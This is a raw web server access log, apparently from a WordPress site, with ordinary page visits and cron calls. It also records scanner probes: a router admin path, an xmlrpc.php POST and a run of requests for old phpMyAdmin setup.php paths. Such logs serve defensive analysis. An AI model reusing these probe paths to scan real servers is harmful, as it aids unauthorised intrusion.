113.249.11.183 - - [30/Oct/2025:19:17:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
113.249.11.183 - - [30/Oct/2025:19:17:41 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
113.249.11.183 - - [30/Oct/2025:19:17:41 +0800] "GET /contacts/ HTTP/1.1" 200 21516 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
36.133.115.36 - - [30/Oct/2025:19:30:07 +0800] "POST /wp-cron.php?doing_wp_cron=1761823807.6220788955688476562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.49.148.238 - - [30/Oct/2025:19:30:07 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [30/Oct/2025:19:34:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761824048.1526110172271728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
24.199.106.26 - - [30/Oct/2025:19:34:08 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
213.209.157.39 - - [30/Oct/2025:19:42:16 +0800] "GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:16 +0800] "GET /phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:17 +0800] "GET /phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:17 +0800] "GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:17 +0800] "GET /phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:18 +0800] "GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:18 +0800] "GET /phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:18 +0800] "GET /phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:19 +0800] "GET /phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:19 +0800] "GET /phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:20 +0800] "GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:21 +0800] "GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:22 +0800] "GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:22 +0800] "GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:23 +0800] "GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:23 +0800] "GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:24 +0800] "GET /phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:24 +0800] "GET /phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:24 +0800] "GET /phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
213.209.157.39 - - [30/Oct/2025:19:42:25 +0800] "GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 27 "-" "Go-http-client/1.1"
